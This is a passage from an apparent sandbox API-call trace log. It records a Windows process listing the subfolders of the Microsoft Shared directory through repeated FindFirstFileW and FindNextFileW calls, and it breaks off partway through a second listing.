lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x6d8e9f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0147.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x6d8e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x2f [0147.288] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x6d8ec14 | out: lpFindFileData=0x6d8ec14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0147.288] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.289] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0147.289] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0147.289] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0147.289] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0147.289] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0147.289] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0147.290] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0147.290] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0147.290] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0147.290] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0147.290] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0147.290] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0147.290] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0147.291] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0147.291] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0147.291] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0147.291] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0147.291] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0147.291] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0147.292] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0147.292] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0147.292] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0147.292] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0147.292] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0147.292] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0147.292] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0147.293] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0147.293] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0147.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeac) returned 1 [0147.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeb8) returned 1 [0147.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8eeec) returned 1 [0147.293] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x6d8e9f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0147.293] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x6d8e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x2f [0147.293] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x6d8ec14 | out: lpFindFileData=0x6d8ec14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0147.293] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.293] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0147.294] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0147.294] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0147.294] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0147.294] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0147.294] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0147.294] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0147.294] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0147.295] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, 